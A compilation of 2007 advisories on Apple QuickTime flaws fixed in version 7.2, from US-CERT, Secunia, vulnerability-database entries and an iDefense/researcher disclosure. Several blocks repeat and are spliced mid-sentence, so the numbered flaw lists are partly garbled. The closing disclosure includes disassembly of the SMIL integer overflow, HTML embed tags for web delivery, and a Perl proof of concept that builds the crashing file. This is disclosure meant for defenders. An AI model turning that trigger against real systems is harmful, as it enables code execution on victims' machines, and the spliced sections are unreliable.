____________________________________________________________________
For instructions on subscribing to or unsubscribing from this
mailing list, visit <http://www.us-cert.gov/cas/signup.html>.
____________________________________________________________________
Produced 2007 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
____________________________________________________________________
Revision History
Thursday July 12, 2007: Initial release
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
iQEVAwUBRpZsJ/RFkHkM87XOAQKLMgf9GpK/pbKTrSe0yKCRMt8Z4lMKl8VE+Rqr
4i8GfVXYUcBKbTlA8TTyf5ucbmCVAnjGJIq0W6X5gLBeA0QxCZ6qto/iPqviuvoV
8tu92/DuerYOkZMvJcn4RjAlMhM9CWCqJh1QG6R2Csn8AyeKEOFDiKYqoDzT+LoQ
zojxmlNJIbUvIIGv8Z12Xkr1LLDmD4rs1nfDEBZm7yLTWRItmXpvSidftdUGETDZ
+ok1SIhkZEbPNT7gAox9RZaKyIRHV7V4wZwqDd3weo6T7UPlhsgRqe88h1R5Yfq8
a7ePH0WSbTCqdGmuoM+nir4iDldoxB8OpbMUQH1nmWcDmc9xv++MHQ==
=EV1X
-----END PGP SIGNATURE-----
VAR-200707-0550 | CVE-2007-2402 | Apple QuickTime fails to properly handle malformed movie files |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
QuickTime for Java in Apple Quicktime before 7.2 does not perform sufficient "access control," which allows remote attackers to obtain sensitive information (screen content) via crafted Java applets. Apple QuickTime fails to properly handle malformed movie files. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial-of-service condition. Apple QuickTime is prone to an information-disclosure and multiple remote code-execution vulnerabilities.
Remote attackers may exploit these issues by enticing victims into opening maliciously crafted files or visiting maliciously crafted websites. Failed exploit attempts of remote code-execution issues may result in denial-of-service conditions. Successful exploits of the information-disclosure issue may lead to further attacks. Apple QuickTime is a popular multimedia player that supports a wide variety of media formats.
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure.
The Full Featured Secunia Network Software Inspector (NSI) is now
available:
http://secunia.com/network_software_inspector/
The Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications.
----------------------------------------------------------------------
TITLE:
Apple QuickTime Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA26034
VERIFY ADVISORY:
http://secunia.com/advisories/26034/
CRITICAL:
Highly critical
IMPACT:
Exposure of sensitive information, DoS, System access
WHERE:
>From remote
REVISION:
1.1 originally posted 2007-07-12
SOFTWARE:
Apple QuickTime 7.x
http://secunia.com/product/5090/
DESCRIPTION:
Some vulnerabilities have been reported in Apple QuickTime, which can
be exploited by malicious people to compromise a user's system.
1) An unspecified error exists in the processing of H.264 movies.
This can be exploited to cause memory corruption and may allow
execution of arbitrary code when a user accesses a specially crafted
H.264 movie.
2) An unspecified error exists in the processing of movie files.
3) An integer overflow error exists in the handling of .m4v files and
can be exploited to execute arbitrary code when a user accesses a
specially crafted .m4v file.
4) An integer overflow error exists in the handling of the "author"
and "title" fields when parsing SMIL files.
5) A design error exists in QuickTime for Java, which can be
exploited to disable security checks and execute arbitrary code when
a user visits a web site containing a specially crafted Java applet.
6) A design error exists in QuickTime for Java, which can be
exploited to bypass security checks and read and write to process
memory. This can lead to execution of arbitrary code when a user
visits a web site containing a specially crafted Java applet.
7) A design error exists in QuickTime for Java due to JDirect
exposing interfaces that may allow loading arbitrary libraries and
freeing arbitrary memory. This can be exploited to execute arbitrary
code when a user visits a web site containing a specially crafted
Java applet.
The vulnerabilities are reported in versions prior to 7.2.
SOLUTION:
Update to version 7.2.
QuickTime 7.2 for Mac:
http://www.apple.com/support/downloads/quicktime72formac.html
QuickTime 7.2 for Windows:
http://www.apple.com/support/downloads/quicktime72forwindows.html
PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Tom Ferris, Security-Protocols.com and Matt
Slot, Ambrosia Software, Inc.
2) The vendor credits Jonathan 'Wolf' Rentzsch of Red Shed Software.
3) The vendor credits Tom Ferris, Security-Protocols.com.
4) David Vaartjes of ITsec Security Services, reported via iDefense.
5, 6, 7) The vendor credits Adam Gowdiak.
8) Reported by the vendor.
CHANGELOG:
2007-07-12: Added link to US-CERT.
ORIGINAL ADVISORY:
Apple:
http://docs.info.apple.com/article.html?artnum=305947
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556
OTHER REFERENCES:
US-CERT VU#582681:
http://www.kb.cert.org/vuls/id/582681
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
National Cyber Alert System
Technical Cyber Security Alert TA07-193A
Apple Releases Security Updates for QuickTime
Original release date: July 12, 2007
Last revised: --
Source: US-CERT
Systems Affected
Apple QuickTime on systems running
* Apple Mac OS X
* Microsoft Windows
Overview
Apple QuickTime contains multiple vulnerabilities.
I. Description
Apple QuickTime 7.2 resolves multiple vulnerabilities in the way
Java applets and various types of media files are handled. Since QuickTime configures most
web browsers to handle QuickTime media files, an attacker could
exploit these vulnerabilities using a web page.
Note that QuickTime ships with Apple iTunes.
For more information, please refer to the Vulnerability Notes
Database.
II. For further information, please see
the Vulnerability Notes Database.
III. Solution
Upgrade QuickTime
Upgrade to QuickTime 7.2. This and other updates for Mac OS X are
available via Apple Update.
On Microsoft Windows, QuickTime users can install the update by
using the built-in auto-update mechanism, Apple Software Update, or
by installing the update manually. Disabling QuickTime in your web browser may defend
against this attack vector. For more information, refer to the
Securing Your Web Browser document. Disabling Java in your web browser may defend against
this attack vector. Instructions for disabling Java can be found in
the Securing Your Web Browser document.
References
* Vulnerability Notes for QuickTime 7.2 -
<http://www.kb.cert.org/vuls/byid?searchview&query=QuickTime_72>
* About the security content of the QuickTime 7.2 Update -
<http://docs.info.apple.com/article.html?artnum=305947>
* How to tell if Software Update for Windows is working correctly when no updates are available -
<http://docs.info.apple.com/article.html?artnum=304263>
* Apple QuickTime 7.2 for Windows -
<http://www.apple.com/support/downloads/quicktime72forwindows.html>
* Apple QuickTime 7.2 for Mac -
<http://www.apple.com/support/downloads/quicktime72formac.html>
* Standalone Apple QuickTime Player -
<http://www.apple.com/quicktime/download/standalone.html>
* Mac OS X: Updating your software -
<http://docs.info.apple.com/article.html?artnum=106704>
* Securing Your Web Browser -
<http://www.us-cert.gov/reading_room/securing_browser/>
____________________________________________________________________
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA07-193A.html>
____________________________________________________________________
Feedback can be directed to US-CERT Technical Staff. Please send
email to <cert@cert.org> with "TA07-193A Feedback VU#582681" in the
subject.
____________________________________________________________________
For instructions on subscribing to or unsubscribing from this
mailing list, visit <http://www.us-cert.gov/cas/signup.html>.
____________________________________________________________________
Produced 2007 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
____________________________________________________________________
Revision History
Thursday July 12, 2007: Initial release
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
iQEVAwUBRpZsJ/RFkHkM87XOAQKLMgf9GpK/pbKTrSe0yKCRMt8Z4lMKl8VE+Rqr
4i8GfVXYUcBKbTlA8TTyf5ucbmCVAnjGJIq0W6X5gLBeA0QxCZ6qto/iPqviuvoV
8tu92/DuerYOkZMvJcn4RjAlMhM9CWCqJh1QG6R2Csn8AyeKEOFDiKYqoDzT+LoQ
zojxmlNJIbUvIIGv8Z12Xkr1LLDmD4rs1nfDEBZm7yLTWRItmXpvSidftdUGETDZ
+ok1SIhkZEbPNT7gAox9RZaKyIRHV7V4wZwqDd3weo6T7UPlhsgRqe88h1R5Yfq8
a7ePH0WSbTCqdGmuoM+nir4iDldoxB8OpbMUQH1nmWcDmc9xv++MHQ==
=EV1X
-----END PGP SIGNATURE-----
VAR-200707-0546 | CVE-2007-2393 | Apple QuickTime fails to properly handle malformed movie files |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
The design of QuickTime for Java in Apple Quicktime before 7.2 allows remote attackers to bypass certain security controls and write to process memory via Java applets, possibly leading to arbitrary code execution. Apple QuickTime fails to properly handle malformed movie files. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial-of-service condition. Apple QuickTime is prone to an information-disclosure and multiple remote code-execution vulnerabilities.
Remote attackers may exploit these issues by enticing victims into opening maliciously crafted files or visiting maliciously crafted websites. Failed exploit attempts of remote code-execution issues may result in denial-of-service conditions. Successful exploits of the information-disclosure issue may lead to further attacks. Apple QuickTime is a popular multimedia player that supports a wide variety of media formats.
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure.
The Full Featured Secunia Network Software Inspector (NSI) is now
available:
http://secunia.com/network_software_inspector/
The Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications.
----------------------------------------------------------------------
TITLE:
Apple QuickTime Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA26034
VERIFY ADVISORY:
http://secunia.com/advisories/26034/
CRITICAL:
Highly critical
IMPACT:
Exposure of sensitive information, DoS, System access
WHERE:
>From remote
REVISION:
1.1 originally posted 2007-07-12
SOFTWARE:
Apple QuickTime 7.x
http://secunia.com/product/5090/
DESCRIPTION:
Some vulnerabilities have been reported in Apple QuickTime, which can
be exploited by malicious people to compromise a user's system.
1) An unspecified error exists in the processing of H.264 movies.
This can be exploited to cause memory corruption and may allow
execution of arbitrary code when a user accesses a specially crafted
H.264 movie.
2) An unspecified error exists in the processing of movie files.
3) An integer overflow error exists in the handling of .m4v files and
can be exploited to execute arbitrary code when a user accesses a
specially crafted .m4v file.
4) An integer overflow error exists in the handling of the "author"
and "title" fields when parsing SMIL files. This can lead to execution of arbitrary code when a user
visits a web site containing a specially crafted Java applet. This can be exploited to execute arbitrary
code when a user visits a web site containing a specially crafted
Java applet.
8) A design error exists in QuickTime for Java, which can be
exploited to capture the user's screen content when a user visits a
web site containing a specially crafted Java applet.
The vulnerabilities are reported in versions prior to 7.2.
SOLUTION:
Update to version 7.2.
QuickTime 7.2 for Mac:
http://www.apple.com/support/downloads/quicktime72formac.html
QuickTime 7.2 for Windows:
http://www.apple.com/support/downloads/quicktime72forwindows.html
PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Tom Ferris, Security-Protocols.com and Matt
Slot, Ambrosia Software, Inc.
2) The vendor credits Jonathan 'Wolf' Rentzsch of Red Shed Software.
3) The vendor credits Tom Ferris, Security-Protocols.com.
4) David Vaartjes of ITsec Security Services, reported via iDefense.
5, 6, 7) The vendor credits Adam Gowdiak.
8) Reported by the vendor.
CHANGELOG:
2007-07-12: Added link to US-CERT.
ORIGINAL ADVISORY:
Apple:
http://docs.info.apple.com/article.html?artnum=305947
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556
OTHER REFERENCES:
US-CERT VU#582681:
http://www.kb.cert.org/vuls/id/582681
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
National Cyber Alert System
Technical Cyber Security Alert TA07-193A
Apple Releases Security Updates for QuickTime
Original release date: July 12, 2007
Last revised: --
Source: US-CERT
Systems Affected
Apple QuickTime on systems running
* Apple Mac OS X
* Microsoft Windows
Overview
Apple QuickTime contains multiple vulnerabilities.
I. Description
Apple QuickTime 7.2 resolves multiple vulnerabilities in the way
Java applets and various types of media files are handled. Since QuickTime configures most
web browsers to handle QuickTime media files, an attacker could
exploit these vulnerabilities using a web page.
Note that QuickTime ships with Apple iTunes.
For more information, please refer to the Vulnerability Notes
Database.
II. For further information, please see
the Vulnerability Notes Database.
III. Solution
Upgrade QuickTime
Upgrade to QuickTime 7.2. This and other updates for Mac OS X are
available via Apple Update.
On Microsoft Windows, QuickTime users can install the update by
using the built-in auto-update mechanism, Apple Software Update, or
by installing the update manually. Disabling QuickTime in your web browser may defend
against this attack vector. For more information, refer to the
Securing Your Web Browser document. Disabling Java in your web browser may defend against
this attack vector. Instructions for disabling Java can be found in
the Securing Your Web Browser document.
References
* Vulnerability Notes for QuickTime 7.2 -
<http://www.kb.cert.org/vuls/byid?searchview&query=QuickTime_72>
* About the security content of the QuickTime 7.2 Update -
<http://docs.info.apple.com/article.html?artnum=305947>
* How to tell if Software Update for Windows is working correctly when no updates are available -
<http://docs.info.apple.com/article.html?artnum=304263>
* Apple QuickTime 7.2 for Windows -
<http://www.apple.com/support/downloads/quicktime72forwindows.html>
* Apple QuickTime 7.2 for Mac -
<http://www.apple.com/support/downloads/quicktime72formac.html>
* Standalone Apple QuickTime Player -
<http://www.apple.com/quicktime/download/standalone.html>
* Mac OS X: Updating your software -
<http://docs.info.apple.com/article.html?artnum=106704>
* Securing Your Web Browser -
<http://www.us-cert.gov/reading_room/securing_browser/>
____________________________________________________________________
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA07-193A.html>
____________________________________________________________________
Feedback can be directed to US-CERT Technical Staff. Please send
email to <cert@cert.org> with "TA07-193A Feedback VU#582681" in the
subject.
____________________________________________________________________
For instructions on subscribing to or unsubscribing from this
mailing list, visit <http://www.us-cert.gov/cas/signup.html>.
____________________________________________________________________
Produced 2007 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
____________________________________________________________________
Revision History
Thursday July 12, 2007: Initial release
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
iQEVAwUBRpZsJ/RFkHkM87XOAQKLMgf9GpK/pbKTrSe0yKCRMt8Z4lMKl8VE+Rqr
4i8GfVXYUcBKbTlA8TTyf5ucbmCVAnjGJIq0W6X5gLBeA0QxCZ6qto/iPqviuvoV
8tu92/DuerYOkZMvJcn4RjAlMhM9CWCqJh1QG6R2Csn8AyeKEOFDiKYqoDzT+LoQ
zojxmlNJIbUvIIGv8Z12Xkr1LLDmD4rs1nfDEBZm7yLTWRItmXpvSidftdUGETDZ
+ok1SIhkZEbPNT7gAox9RZaKyIRHV7V4wZwqDd3weo6T7UPlhsgRqe88h1R5Yfq8
a7ePH0WSbTCqdGmuoM+nir4iDldoxB8OpbMUQH1nmWcDmc9xv++MHQ==
=EV1X
-----END PGP SIGNATURE-----
VAR-200707-0547 | CVE-2007-2394 | Apple QuickTime fails to properly handle malformed movie files |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Integer overflow in Apple Quicktime before 7.2 on Mac OS X 10.3.9 and 10.4.9 allows user-assisted remote attackers to execute arbitrary code via crafted (1) title and (2) author fields in an SMIL file, related to improper calculations for memory allocation. Apple QuickTime fails to properly handle malformed movie files. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial-of-service condition. Apple QuickTime is prone to an information-disclosure and multiple remote code-execution vulnerabilities.
Remote attackers may exploit these issues by enticing victims into opening maliciously crafted files or visiting maliciously crafted websites. Failed exploit attempts of remote code-execution issues may result in denial-of-service conditions. Successful exploits of the information-disclosure issue may lead to further attacks.
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure.
The Full Featured Secunia Network Software Inspector (NSI) is now
available:
http://secunia.com/network_software_inspector/
The Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications.
----------------------------------------------------------------------
TITLE:
Apple QuickTime Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA26034
VERIFY ADVISORY:
http://secunia.com/advisories/26034/
CRITICAL:
Highly critical
IMPACT:
Exposure of sensitive information, DoS, System access
WHERE:
>From remote
REVISION:
1.1 originally posted 2007-07-12
SOFTWARE:
Apple QuickTime 7.x
http://secunia.com/product/5090/
DESCRIPTION:
Some vulnerabilities have been reported in Apple QuickTime, which can
be exploited by malicious people to compromise a user's system.
1) An unspecified error exists in the processing of H.264 movies.
2) An unspecified error exists in the processing of movie files.
5) A design error exists in QuickTime for Java, which can be
exploited to disable security checks and execute arbitrary code when
a user visits a web site containing a specially crafted Java applet.
6) A design error exists in QuickTime for Java, which can be
exploited to bypass security checks and read and write to process
memory.
7) A design error exists in QuickTime for Java due to JDirect
exposing interfaces that may allow loading arbitrary libraries and
freeing arbitrary memory.
8) A design error exists in QuickTime for Java, which can be
exploited to capture the user's screen content when a user visits a
web site containing a specially crafted Java applet.
QuickTime 7.2 for Mac:
http://www.apple.com/support/downloads/quicktime72formac.html
QuickTime 7.2 for Windows:
http://www.apple.com/support/downloads/quicktime72forwindows.html
PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Tom Ferris, Security-Protocols.com and Matt
Slot, Ambrosia Software, Inc.
2) The vendor credits Jonathan 'Wolf' Rentzsch of Red Shed Software.
3) The vendor credits Tom Ferris, Security-Protocols.com.
5, 6, 7) The vendor credits Adam Gowdiak.
8) Reported by the vendor.
CHANGELOG:
2007-07-12: Added link to US-CERT.
ORIGINAL ADVISORY:
Apple:
http://docs.info.apple.com/article.html?artnum=305947
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556
OTHER REFERENCES:
US-CERT VU#582681:
http://www.kb.cert.org/vuls/id/582681
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
National Cyber Alert System
Technical Cyber Security Alert TA07-193A
Apple Releases Security Updates for QuickTime
Original release date: July 12, 2007
Last revised: --
Source: US-CERT
Systems Affected
Apple QuickTime on systems running
* Apple Mac OS X
* Microsoft Windows
Overview
Apple QuickTime contains multiple vulnerabilities.
I. Description
Apple QuickTime 7.2 resolves multiple vulnerabilities in the way
Java applets and various types of media files are handled. Since QuickTime configures most
web browsers to handle QuickTime media files, an attacker could
exploit these vulnerabilities using a web page.
Note that QuickTime ships with Apple iTunes.
For more information, please refer to the Vulnerability Notes
Database. For further information, please see
the Vulnerability Notes Database. Solution
Upgrade QuickTime
Upgrade to QuickTime 7.2.
On Microsoft Windows, QuickTime users can install the update by
using the built-in auto-update mechanism, Apple Software Update, or
by installing the update manually. Disabling QuickTime in your web browser may defend
against this attack vector. For more information, refer to the
Securing Your Web Browser document. Disabling Java in your web browser may defend against
this attack vector. Instructions for disabling Java can be found in
the Securing Your Web Browser document.
References
* Vulnerability Notes for QuickTime 7.2 -
<http://www.kb.cert.org/vuls/byid?searchview&query=QuickTime_72>
* About the security content of the QuickTime 7.2 Update -
<http://docs.info.apple.com/article.html?artnum=305947>
* How to tell if Software Update for Windows is working correctly when no updates are available -
<http://docs.info.apple.com/article.html?artnum=304263>
* Apple QuickTime 7.2 for Windows -
<http://www.apple.com/support/downloads/quicktime72forwindows.html>
* Apple QuickTime 7.2 for Mac -
<http://www.apple.com/support/downloads/quicktime72formac.html>
* Standalone Apple QuickTime Player -
<http://www.apple.com/quicktime/download/standalone.html>
* Mac OS X: Updating your software -
<http://docs.info.apple.com/article.html?artnum=106704>
* Securing Your Web Browser -
<http://www.us-cert.gov/reading_room/securing_browser/>
____________________________________________________________________
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA07-193A.html>
____________________________________________________________________
Feedback can be directed to US-CERT Technical Staff. Please send
email to <cert@cert.org> with "TA07-193A Feedback VU#582681" in the
subject.
____________________________________________________________________
For instructions on subscribing to or unsubscribing from this
mailing list, visit <http://www.us-cert.gov/cas/signup.html>.
____________________________________________________________________
Produced 2007 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
____________________________________________________________________
Revision History
Thursday July 12, 2007: Initial release
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
iQEVAwUBRpZsJ/RFkHkM87XOAQKLMgf9GpK/pbKTrSe0yKCRMt8Z4lMKl8VE+Rqr
4i8GfVXYUcBKbTlA8TTyf5ucbmCVAnjGJIq0W6X5gLBeA0QxCZ6qto/iPqviuvoV
8tu92/DuerYOkZMvJcn4RjAlMhM9CWCqJh1QG6R2Csn8AyeKEOFDiKYqoDzT+LoQ
zojxmlNJIbUvIIGv8Z12Xkr1LLDmD4rs1nfDEBZm7yLTWRItmXpvSidftdUGETDZ
+ok1SIhkZEbPNT7gAox9RZaKyIRHV7V4wZwqDd3weo6T7UPlhsgRqe88h1R5Yfq8
a7ePH0WSbTCqdGmuoM+nir4iDldoxB8OpbMUQH1nmWcDmc9xv++MHQ==
=EV1X
-----END PGP SIGNATURE-----
.
II. When parsing an SMIL file,
arithmetic calculations can cause insufficient memory to be allocated.
When copying in user-supplied data from the SMIL file, a heap-based
buffer overflow occurs. This results in a potentially exploitable
condition.
III. This could
be accomplished using a malicious SMIL file referenced from a website
under the attacker's control.
IV. Previous versions are
suspected to be vulnerable.
V. WORKAROUND
iDefense is currently unaware of any effective workarounds for this
vulnerability.
VI. VENDOR RESPONSE
Apple has released QuickTime 7.2 which resolves this issue. More
information is available via Apple's QuickTime Security Update page at
the URL shown below.
http://docs.info.apple.com/article.html?artnum=305947
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-2394 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.
VIII. CREDIT
This vulnerability was reported to iDefense by David Vaartjes from ITsec
Security Services http://www.itsec-ss.nl/.
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES
Copyright \xa9 2007 iDefense, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
.
iDefense confirmed the existence of this vulnerability in version
7.1.3 and 7.1.5 for Windows XP SP2 and Mac OS X also [1]. As QuickTime
binaries for Windows XP and Vista are identical, this issue will
affect QuickTime running on Windows Vista also.
----------------------------------------------------------------------
FIXED VERSIONS
----------------------------------------------------------------------
Apple has released QuickTime version 7.2 for Mac OS X v10.3.9, Mac OS
X v10.4.9 or later, Windows Vista and Windows XP SP2 to address this
issue. See [2] for additional information about this update.
QuickTime 7.2 is not available for the Windows 2000 platform.
Presumably, Apple dropped support for this platform.
----------------------------------------------------------------------
PRODUCT DESCRIPTION
----------------------------------------------------------------------
QuickTime is Apple's media player product. According to Apple,
QuickTime is downloaded over 10 million times a month. According to
Secunia, QuickTime is currently installed on over 50% of PCs [3].
The Synchronized MultiMedia Integration Language (SMIL) provides a
high-level scripting syntax for describing multimedia presentations.
SMIL files are text files that use XML-based syntax to specify what
media elements to present and where and when to present them. This can be exploited to overflow that heap
buffer with user supplied content, which eventually can result in the
execution of arbitrary code.
--
<smil>
<head>
<meta name="title" content="specific-length"/>
<meta name="author" content="specific-length"/>
</head>
</smil>
--
When such a SMIL file is parsed the length value of the author field
is stored in a short int data type (16 bit) without bounds checking.
In sub_66952B50(), this value is (sign) extended to a long int data
type (32 bit).
--
66952C9A push eax
66952C9B call sub_668B57D0
66952CA0 --> movsx eax, word ptr [esp+2Ch+var_C]
66952CA5 mov edx, [esp+2Ch+arg_4]
66952CA9 lea ecx, [esp+2Ch+var_10]
--
So, when the length of the author field is >= 0x8000 bytes, it will be
extended to a length value between 0xffff8000 and 0xffffffff.
Next, in sub_668DCFD0() the sign extended length of the author field
is added to the length of the title field + 0x20:
--
668DD04D jnz short loc_668DD0A0
668DD04F test ebx, ebx
668DD051 jz loc_668DD1EB
668DD057 --> lea eax, [edi+ebx] // edi holds the length of
// the title field + 0x20.
// ebx holds the sign
// extended length of the
// author field.
668DD05A push eax
668DD05B push ecx
--
In sub_668DCA60(), 4 is added to the result of the calculation:
--
668DCB37 test edi, edi
668DCB39 jz short loc_668DCB40
668DCB3B --> lea eax, [edi+4] // edi holds the result
668DCB3E jmp short loc_668DCB42
--
Next, in sub_668F5550() the final length value is used as the dwBytes
argument in a call to HeapRealloc():
--
668F555E push eax // dwBytes (user specified)
668F555F push ecx // lpMem
668F5560 push 1 // dwFlags
668F5562 push edx // hHeap
668F5563 --> call ds:HeapReAlloc
--
This allows for the allocation of a controlled amount of memory. For
example, when setting the length of the author field to 0xff00 (65280)
and the length of the title field to 0xdf (223), the following
situation occurs:
1: sub_66952B50():
0x0000ff00 will be sign extended to 0xffffff00.
2: sub_668DCFD0():
0x000000ff (0x000000df + 0x00000020) will be added to 0xffffff00
resulting in a length value of 0xffffffff.
3: sub_668DCA60():
0x00000004 is added to 0xffffffff, resulting in a value of 0x00000003.
4: sub_668F5550():
HeapRealloc() will allocate 0x00000003 bytes of memory.
Next, the pointer returned by HeapRealloc() is used by sub_668DCFD0()
as the dest argument in a call to memcpy():
--
668DD08E push ebx // count, length value right
// after sign extension
// (0xffffff00).
668DD08F push edx // src, buffer with user
// supplied (author) content.
668DD090 add eax, esi
668DD092 --> push eax // dest, 3 byte buffer.
668DD093 call _memcpy
668DD098 add esp, 18h
668DD09B jmp loc_668DD1E5
--
This copy action will result in an overflow of the 3 byte heap
buffer with data from the author field (user supplied). Due to the
large amount of data written, this will finally result in an access
violation when memory is read or written outside the heap page. The
exception is handled by the program and execution continues with a
corrupt heap.
For my platform (win2k), when a call to HeapAlloc() is executed the
unlink code of ntdll will "fail" because we have overwritten pointers
in the heap management structures of other heap buffers with our data.
The status of the registers during unlinking is:
--
EAX 78787878 <-- user supplied
ECX 78787878 <-- user supplied
EDX 012DF6F0 ASCII "xxxxxxxxxxx <-> xxxxxxxxxxxx"
EBX 00000078
ESP 0012EDC8
EBP 0012EF84
ESI 01200000
EDI 012DF6F0 ASCII "xxxxxxxxxxx <-> xxxxxxxxxxxx"
--
--
77f867e6 mov dword ptr ds:[ecx],eax
77f867e8 mov dword ptr ds:[eax+4],ecx
--
The unlink instructions will result in the following exception:
---------------------------
QuickTimePlayerMain: QuickTimePlayer.exe
"The instruction at "0x77f867e6" referenced memory at "0x78787878".
The memory could not be "written"
---------------------------
This shows that we are able to overwrite 4 bytes anywhere in the
address space of the process with "any" 4 byte value we want, which
can for example be exploited to overwrite function pointers like the
SEH or UEF to gain control of the process. This 4 byte overwrite via
the unlink code does not apply to XPSP2 and W2K3 as "safe unlinking"
is used on these platforms.
----------------------------------------------------------------------
ATTACK VECTORS
----------------------------------------------------------------------
This vulnerability can be triggered by luring a target user into
running a malicious SMIL file locally or via a webpage. In the later
scenario the OBJECT (IE) and/or EMBED (FireFox) tags can be used:
<OBJECT
CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab"
WIDTH="10" HEIGHT="10" >
<!-- malicious SMIL file -->
<PARAM NAME="src" VALUE="poc.smil" />
<EMBED
<!-- available .qtif or .mov file to start up QT for FF -->
SRC="available-sample.qtif"
<!-- malicious SMIL file -->
QTSRC="poc.smil"
WIDTH="10" HEIGHT="10"
PLUGINSPAGE="www.apple.com/quicktime/download"
TYPE="video/quicktime"
/>
</OBJECT>
----------------------------------------------------------------------
PROOF OF CONCEPT
----------------------------------------------------------------------
#!/usr/bin/perl -w
####
# QuickTime SMIL integer overflow vulnerability (CVE-2007-2394) POC
#
# Researched on QuickTime 7.1.3 on Windows 2000 SP4.
#
# David Vaartjes <d.vaartjes at gmail.com>
####
$file = "poc.smil";
$padd = "x";
$cop_len = 36;
####
# By choosing the following lengths the
# integer overflow will be triggered.
####
$tit_len = 223;
$auth_len = 65280;
open(FH,">$file") or die "Can't open file:$!";
print FH
"<smil>\n".
"<head>\n".
" <meta name=\"title\" content=\"".$padd x $tit_len."\"/>\n".
" <meta name=\"author\" content=\"".$padd x $auth_len."\"/>\n".
" <meta name=\"copyright\" content=\"".$padd x $cop_len."\"/>\n".
"</head>\n".
"</smil>";
close(FH);
----------------------------------------------------------------------
REFERENCES
----------------------------------------------------------------------
